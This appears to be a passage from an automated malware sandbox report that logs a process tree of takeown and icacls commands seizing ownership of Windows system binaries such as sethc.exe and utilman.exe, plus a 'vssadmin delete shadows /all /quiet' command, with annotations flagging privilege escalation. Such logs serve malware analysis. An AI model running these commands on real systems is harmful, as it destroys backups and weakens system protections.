C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\reg.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main" /grant Administrators:F2⤵PID:832
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\reg.exe" /grant Administrators:F2⤵PID:2848
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers" /grant Administrators:F2⤵PID:1572
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu" /grant Administrators:F2⤵PID:1980
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad" /grant Administrators:F2⤵PID:2456
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:600
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred" /grant Administrators:F2⤵PID:1468
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\taskmgr.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols" /grant Administrators:F2⤵PID:2936
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\taskmgr.exe" /grant Administrators:F2⤵PID:2040
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web" /grant Administrators:F2⤵PID:2672
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\he-IL" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\he-IL" /grant Administrators:F2⤵PID:692
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR" /a2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR" /grant Administrators:F2⤵PID:296
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU" /grant Administrators:F2⤵PID:2552
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization" /grant Administrators:F2⤵PID:2108
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\utilman.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\it-IT" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\utilman.exe" /grant Administrators:F2⤵PID:580
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\it-IT" /grant Administrators:F2⤵PID:1004
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP" /grant Administrators:F2⤵PID:1612
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR" /grant Administrators:F2⤵PID:2188
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT" /grant Administrators:F2⤵PID:1464
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV" /grant Administrators:F2⤵PID:284
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\perfmon.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO" /grant Administrators:F2⤵PID:928
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\perfmon.exe" /grant Administrators:F2⤵PID:2372
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL" /a2⤵PID:1568
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL" /grant Administrators:F2⤵PID:2052
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL" /a2⤵PID:608
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL" /grant Administrators:F2⤵PID:1460
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR" /a2⤵PID:1552
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR" /grant Administrators:F2⤵PID:844
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT" /a2⤵PID:1268
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT" /grant Administrators:F2⤵PID:848
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO" /a2⤵PID:1980
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO" /grant Administrators:F2⤵PID:1204
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\perfmon.msc" /a2⤵PID:316
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU" /a2⤵PID:2428
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\perfmon.msc" /grant Administrators:F2⤵PID:2156
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU" /grant Administrators:F2⤵PID:1896
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK" /a2⤵PID:3032
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK" /grant Administrators:F2⤵PID:1520
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI" /a2⤵PID:2744
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI" /grant Administrators:F2⤵PID:2800
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS" /a2⤵PID:2540
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS" /grant Administrators:F2⤵PID:2712
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE" /a2⤵PID:2604
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE" /grant Administrators:F2⤵PID:1776
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\resmon.exe" /a2⤵PID:2680
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\th-TH" /a2⤵PID:2560
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\th-TH" /grant Administrators:F2⤵PID:2672
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\resmon.exe" /grant Administrators:F2⤵PID:2040
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR" /a2⤵PID:1064
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR" /grant Administrators:F2⤵PID:584
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA" /a2⤵PID:2984
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA" /grant Administrators:F2⤵PID:2764
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN" /a2⤵PID:2600
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN" /grant Administrators:F2⤵PID:1988
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW" /a2⤵PID:2380
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW" /grant Administrators:F2⤵
- Possible privilege escalation attempt
PID:1404
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\MSInfo" /a2⤵PID:780
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\MSInfo" /grant Administrators:F2⤵PID:2804
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\sethc.exe" /a2⤵PID:2268
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\MSInfo\msinfo32.exe" /a2⤵PID:2388
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\sethc.exe" /grant Administrators:F2⤵
- Modifies file permissions
PID:2408
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\MSInfo\msinfo32.exe" /grant Administrators:F2⤵PID:1348
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\MSInfo\de-DE" /a2⤵PID:2376
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\MSInfo\de-DE" /grant Administrators:F2⤵PID:1724
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US" /a2⤵PID:1736
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US" /grant Administrators:F2⤵PID:1640
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\MSInfo\es-ES" /a2⤵PID:2492
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\MSInfo\es-ES" /grant Administrators:F2⤵PID:2280
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\MSInfo\fr-FR" /a2⤵PID:2024
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\taskkill.exe" /a2⤵
- Modifies file permissions
PID:2120
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\MSInfo\fr-FR" /grant Administrators:F2⤵PID:2052
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\taskkill.exe" /grant Administrators:F2⤵PID:844
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\MSInfo\it-IT" /a2⤵PID:3020
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\MSInfo\it-IT" /grant Administrators:F2⤵PID:1152
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\MSInfo\ja-JP" /a2⤵PID:1980
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\MSInfo\ja-JP" /grant Administrators:F2⤵PID:1060
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\OFFICE14" /a2⤵PID:2060
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\OFFICE14" /grant Administrators:F2⤵PID:2012
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /a2⤵PID:2428
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /grant Administrators:F2⤵PID:2696
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\sfc.exe" /a2⤵PID:2760
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures" /a2⤵PID:1732
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\sfc.exe" /grant Administrators:F2⤵PID:1408
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures" /grant Administrators:F2⤵PID:1520
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform" /a2⤵PID:348
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform" /grant Administrators:F2⤵PID:2552
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE" /a2⤵PID:2680
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE" /grant Administrators:F2⤵PID:1716
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Stationery" /a2⤵
- Modifies file permissions
PID:2056
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Stationery" /grant Administrators:F2⤵PID:2724
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\rundll32.exe" /a2⤵PID:836
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\TextConv" /a2⤵PID:2212
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\TextConv" /grant Administrators:F2⤵PID:1824
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\rundll32.exe" /grant Administrators:F2⤵PID:2412
-
-
C:\windows\system32\vssadmin.exe"C:\windows\system32\vssadmin.exe" delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1664
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\TextConv\de-DE" /a2⤵PID:1860
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\TextConv\de-DE" /grant Administrators:F2⤵
- Modifies file permissions
PID:2088
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\TextConv\en-US" /a2⤵PID:1632
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\TextConv\en-US" /grant Administrators:F2⤵PID:1348
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\TextConv\es-ES" /a2⤵PID:2736
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\TextConv\es-ES" /grant Administrators:F2⤵PID:1464
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\TextConv\fr-FR" /a2⤵PID:2116
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\TextConv\fr-FR" /grant Administrators:F2⤵PID:2504
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\TextConv\it-IT" /a2⤵PID:1952
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\TextConv\it-IT" /grant Administrators:F2⤵PID:1532
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\TextConv\ja-JP" /a2⤵PID:2236
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\TextConv\ja-JP" /grant Administrators:F2⤵PID:2492
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Triedit" /a2⤵PID:332
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Triedit" /grant Administrators:F2⤵PID:1700
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Triedit\de-DE" /a2⤵PID:1568
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Triedit\de-DE" /grant Administrators:F2⤵PID:2444
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Triedit\en-US" /a2⤵PID:2000
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Triedit\en-US" /grant Administrators:F2⤵PID:1156
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Triedit\es-ES" /a2⤵PID:344
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Triedit\es-ES" /grant Administrators:F2⤵PID:2012
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Triedit\fr-FR" /a2⤵PID:1204
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Triedit\fr-FR" /grant Administrators:F2⤵PID:1728
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Triedit\it-IT" /a2⤵PID:1516
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Triedit\it-IT" /grant Administrators:F2⤵PID:2868
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Triedit\ja-JP" /a2⤵PID:2428
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Triedit\ja-JP" /grant Administrators:F2⤵PID:2716
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\VC" /a2⤵PID:2264
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\VC" /grant Administrators:F2⤵PID:2452
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\VGX" /a2⤵PID:1820
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\VGX" /grant Administrators:F2⤵PID:2068
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\VSTO" /a2⤵PID:2184
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\VSTO" /grant Administrators:F2⤵PID:600
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0" /a2⤵PID:1356
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0" /grant Administrators:F2⤵PID:1648
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe" /a2⤵PID:1396
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe" /grant Administrators:F2⤵PID:2832
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\1033" /a2⤵PID:3016
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\1033" /grant Administrators:F2⤵PID:3028
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Services" /a2⤵PID:1656
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Services" /grant Administrators:F2⤵PID:1632
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines" /a2⤵PID:2736
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines" /grant Administrators:F2⤵PID:2652
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft" /a2⤵PID:2636
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft" /grant Administrators:F2⤵
- Modifies file permissions
PID:3024
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20" /a2⤵PID:1956
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20" /grant Administrators:F2⤵PID:1688
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\de-DE" /a2⤵PID:2468
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\de-DE" /grant Administrators:F2⤵PID:3008
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US" /a2⤵PID:2960
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US" /grant Administrators:F2⤵PID:2180
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk" /a2⤵PID:832
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk" /grant Administrators:F2⤵PID:2484
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\es-ES" /a2⤵PID:884
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\es-ES" /grant Administrators:F2⤵PID:1060
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\fr-FR" /a2⤵PID:1532
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\fr-FR" /grant Administrators:F2⤵
- Possible privilege escalation attempt
PID:2000
-
-
